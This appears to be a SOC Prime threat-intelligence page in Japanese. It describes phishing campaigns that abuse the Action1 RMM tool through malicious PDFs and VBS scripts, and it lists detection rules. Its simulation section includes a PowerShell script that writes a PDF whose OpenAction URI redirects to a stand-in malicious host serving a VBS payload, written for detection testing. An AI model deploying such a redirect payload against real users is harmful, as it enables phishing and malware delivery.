SOC Prime Bias: High

06 Oct 2026 14:36 UTC

アクティブな脅威キャンペーンでRMMツールの悪用が続々と拡大

Author Photo
SOC Prime Team linkedin icon フォローする
アクティブな脅威キャンペーンでRMMツールの悪用が続々と拡大
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

脅威アクターは、特にAction1を使用してリモート管理および監視(RMM)ツールを悪用し、侵害された環境内に永続的なアクセスを確立しています。攻撃は、被害者をVBSファイルにリダイレクトする悪意のあるPDFを含むフィッシングメールから始まります。このスクリプトは、その後、正当なAction1エージェントを含むMSIパッケージをダウンロードしてインストールし、不正なリモートアクセスを可能にします。

調査

調査により、OpenActionおよびURIキーワードを悪用し、VercelにホストされたURLからダウンロードを開始する悪意のあるPDFが発見されました。取得されたMSIパッケージの解析により、ベンダー自身のクラウドインフラストラクチャを通じて不正利用されている正当なAction1 Corporationファイルが明らかになりました。インストールされたエージェントは特定のCustomerIDを含み、正当なAction1ドメインと通信します。

緩和策

組織は、OpenActionまたはURIキーワードを含む疑わしいPDF構造を識別するためにメールフィルタリングを構成する必要があります。セキュリティチームは、不正なRMMツールのインストールやA1Agentサービスの作成を監視する必要があります。予期しないRMMクラウドインフラストラクチャへの接続をブロックし、異常または不正なCustomerIDを特定することで、リモートアクセスの不正利用リスクをさらに軽減することができます。

対応

悪意のあるRMMアクティビティが検出された場合、追加のリモートコマンド実行を防ぐために影響を受けたホストを隔離します。フィッシングメールの送信元を調査し、関連するVBSおよびMSIファイルのフォレンジック分析を実施します。潜在的に侵害された資格情報を取り消し、不正なリモートアクセスや永続性の指標を確認するためにAction1エージェントの構成を見直します。

攻撃フロー

この部分をまだ更新しています。

検出

LOLBAS WScript / CScript(プロセス作成経由)

SOC Primeチーム
2026年10月6日

代替リモートアクセス/管理ソフトウェア(プロセス作成経由)

SOC Primeチーム
2026年10月6日

サードパーティサービス/ツールを介したデータ侵入/流出/C2の可能性(プロキシ経由)

SOC Primeチーム
2026年10月6日

サードパーティサービス/ツールを介したデータ侵入/流出/C2の可能性(DNS経由)

SOC Primeチーム
2026年10月6日

リモートアクセスソフトウェアのドメイン通信試みによる指令統制活動の可能性(DNS経由)

SOC Primeチーム
2026年10月6日

IOCs (HashSha256) を検出:野にあるさらなるRMMツール

SOC Prime AIルール
2026年10月6日

Action1企業サーバーへのリモート接続 [Windowsネットワーク接続]

SOC Prime AIルール
2026年10月6日

悪意のあるVBSへのPDF OpenActionおよびURIリダイレクト [Windowsファイルイベント]

SOC Prime AIルール
2026年10月6日

シミュレーション実行

  • 攻撃のストーリーとコマンド: 敵対者はフィッシングキャンペーンをシミュレートしています。目的は、 Transaction Receipt.pdf という名前のファイルを被害者に届けることです。このPDFは特別に作成されており、ユーザーが開くとすぐに /OpenAction コマンドが /URI リダイレクトをトリガーします。このリダイレクトは、悪意のあるVBScriptを提供するサイトにユーザーを導くために設計されています。提供された特定の検出ルールをトリガーするために、正確な名前と内部文字列を必要とするファイルを作成します。

  • 回帰テストスクリプト:

    # シミュレーションスクリプト: PDF OpenAction検出のトリガー
    $targetFile = "$env:USERPROFILEDesktopTransaction Receipt.pdf"
    
    # 検出キーワードに一致する「悪意のある」PDF内容を作成
    $pdfContent = @"
    %PDF-1.1
    1 0 obj
    << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >>
    endobj
    2 0 obj
    << /Type /Pages /Parent 1 0 R /Count 1 >>
    endobj
    trailer
    << /Root 1 0 R >>
    %%EOF
    "@
    
    # 'file_event'検出をトリガーするためにファイルをディスクに書き込み
    $pdfContent | Out-File -FilePath $targetFile -Encoding ascii
    
    Write-Host "シミュレーションファイルが作成されました: $targetFile"
    Write-Host "SIEMで検出アラートを確認してください。"
  • クリーンアップコマンド:

    # クリーンアップ: シミュレートされた悪意のあるファイルを削除
    $targetFile = "$env:USERPROFILEDesktopTransaction Receipt.pdf"
    if (Test-Path $targetFile) {
        Remove-Item -Path $targetFile -Force
        Write-Host "クリーンアップ完了: $targetFile を削除しました。"
    } else {
        Write-Host "クリーンアップ: ファイルが見つかりません。"
    }